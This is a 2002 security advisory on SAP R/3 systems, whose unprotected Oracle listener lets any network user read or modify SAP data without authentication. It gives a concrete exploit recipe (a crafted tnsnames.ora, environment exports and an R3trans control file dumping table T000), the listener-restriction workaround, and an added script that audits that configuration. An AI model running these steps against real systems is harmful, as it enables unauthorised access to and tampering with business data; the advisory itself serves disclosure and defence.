26th Sep 2002 [SBWID-5317]
COMMAND
	SAP R/3 spoofing via database listener
SYSTEMS AFFECTED
	All R/3 Releases using SQL*net V2 (3.x, 4.x, 6.10)
PROBLEM
	From Jochen Hein's [[email protected]] announcement:
	Every user having network access to the  oracle  listener  port  on  the
	database host may read/write/modify any SAP data.
	 Exploit :
	 =======
	Needed knowledge: IP address (and port) of the database host and the
	System ID (SID). You may get them with a packet sniffer, social
	engineering or just by running sapinfo against a running SAP R/3. sapinfo
	also tells you the R/3 release, which we'll need (we use the R3trans of
	that release).
	With this information an attacker can create a local user sidadm,
	craft a tnsnames.ora and an environment for running R3trans.
	
	  SID.world =
	  (DESCRIPTION =
	    (ADDRESS_LIST =
	        (ADDRESS =
	          (COMMUNITY = sap.world)
	          (PROTOCOL = TCP)
	          (Host = hostname)
	          (Port = 1527)
	        )
	    )
	    (CONNECT_DATA =
	       (SID = SID)
	       (GLOBAL_NAME = SID.world)
	    )
	  )
	
	And running the commands (note you need the R3trans from the target  R/3
	release):
	
sidadm> export TNS_ADMIN=$HOME/            # directory holding the crafted tnsnames.ora
sidadm> export ORACLE_HOME=/oracle/SID
sidadm> export ORACLE_SID=SID
sidadm> export PATH="$PATH:/oracle/SID/817_32/bin:/usr/sap/SID/SYS/exe/run"
sidadm> export dbms_type=ora               # R3trans: use the Oracle database interface
sidadm> export DIR_LIBRARY=/usr/sap/SID/SYS/exe/run
sidadm> export dbs_ora_tnsname=SID         # TNS alias defined in the tnsnames.ora above
sidadm> export TNS_ADMIN=/home/sidadm      # same directory as $HOME above
	sidadm> cat control
	export
	compress=no
	client=000
	# select table where name = T000
	select * from t000
	sidadm> R3trans control
	...
	sidadm> strings trans.dat
	...
	q  000SAP AG             Walldorf               DEM [...]
	q  001Auslieferungsmandant R11 Kundstadt        EUR [...]
	...
	
	Any user on the  local  network  can  access  any  SAP  data  read/write
	without password. No SAP authority checks are applied.
	...
	 References :
	 ==========
	A complete exploit and more remarks are available (in German) at [2].
	OSS note 186119.
	
	 1. http://www.sap.com/
	 2. http://www.lan-ks.de/~jochen/sap-r3/ora-hack.html
	 3. mailto:[email protected]
	
SOLUTION
	The workaround is to restrict access to the Oracle listener port, either
	by network means (a firewall) or with the following protocol.ora options
	on the database server:
	
	tcp.nodelay = true
	tcp.validnode_checking = yes
	tcp.invited_nodes = ( hostname, hostname )
	
	tcp.nodelay is a performance option and plays no part in the restriction;
	the access control comes from tcp.validnode_checking together with the
	tcp.invited_nodes list, which must name only the SAP application servers
	(and any administrative hosts) that legitimately connect to the database.
	On Oracle 9i and later these parameters are read from sqlnet.ora rather
	than protocol.ora. The node check filters on the client's source address
	only, so it complements rather than replaces a firewall rule.
	There is no patch available.
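	The workaround above is only effective if the node check is actually
	switched on and the invited list has been filled in with real hosts. The
	following script is an added example, not part of the original advisory
	and not SAP or Oracle code: it audits a protocol.ora (or, on Oracle 9i
	and later, sqlnet.ora) fragment for those two conditions and shows a
	weak fragment, an unfilled placeholder fragment (the literal "hostname"
	entries from the snippet above) and a hardened fragment side by side. It
	assumes the "name = value" line syntax shown above, the parameter names
	tcp.validnode_checking and tcp.invited_nodes, and that yes/on/true are
	the spellings that enable the check; the sample files and the addresses
	in them are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original advisory and not SAP or Oracle
# code: audit a protocol.ora (or, on Oracle 9i and later, sqlnet.ora)
# fragment for the valid node checking settings the workaround relies on.
# Assumptions: "name = value" lines as in the advisory; parameter names
# tcp.validnode_checking and tcp.invited_nodes; the addresses in the
# constructed samples below are documentation addresses, not real hosts.

# get_param FILE NAME: print the value of NAME (case-insensitive, last
# occurrence wins, all whitespace removed); prints nothing if absent.
get_param() {
    grep -i "^[[:space:]]*$2[[:space:]]*=" "$1" | tail -n 1 \
        | sed -e 's/^[^=]*=//' -e 's/[[:space:]]//g'
}

# check_valid_node_config FILE: return 0 when node checking is switched on
# and the invited list is explicit; otherwise print the reason and return 1.
check_valid_node_config() {
    vnc=$(get_param "$1" tcp.validnode_checking | tr 'A-Z' 'a-z')
    case "$vnc" in
        yes|on|true) ;;   # spellings accepted as "enabled" (assumption)
        *) echo "tcp.validnode_checking not enabled (value: '${vnc:-unset}')"
           return 1 ;;
    esac
    inv=$(get_param "$1" tcp.invited_nodes | tr -d '()')
    if [ -z "$inv" ]; then
        echo "tcp.invited_nodes missing or empty: every source address is accepted"
        return 1
    fi
    # An unfilled placeholder (the literal "hostname" from the advisory's
    # snippet) or a wildcard would leave the listener open again.
    case ",$inv," in
        *\**|*,hostname,*|*,0.0.0.0,*)
            echo "tcp.invited_nodes contains a placeholder or wildcard: $inv"
            return 1 ;;
    esac
    echo "ok: invited nodes = $inv"
    return 0
}

# write_samples DIR: constructed sample fragments for the demonstration.
write_samples() {
    # Weak: only the performance option, no node check at all.
    printf 'tcp.nodelay = true\n' > "$1/weak.ora"
    # Placeholder: node check on, but the list was never filled in.
    printf 'tcp.validnode_checking = yes\ntcp.invited_nodes = ( hostname, hostname )\n' \
        > "$1/placeholder.ora"
    # Hardened: node check on, explicit list of the SAP application servers.
    printf 'tcp.nodelay = true\ntcp.validnode_checking = yes\n' > "$1/hardened.ora"
    printf 'tcp.invited_nodes = ( 192.0.2.10, 192.0.2.11, sapapp1.example.com )\n' \
        >> "$1/hardened.ora"
}

main() {
    d=$(mktemp -d)
    write_samples "$d"
    for name in weak placeholder hardened; do
        printf '%s.ora: ' "$name"
        check_valid_node_config "$d/$name.ora" || true
    done
    rm -rf "$d"
}
main
```

	Run it against the real file on the database host
	(check_valid_node_config /path/to/protocol.ora) as a post-change check;
	a non-zero exit means the listener still accepts connections from any
	source and the R3trans procedure above will work from an attacker's
	machine. Note that Oracle also knows tcp.excluded_nodes, but a deny list
	does not help here: the point of the workaround is an explicit allow
	list of the application servers.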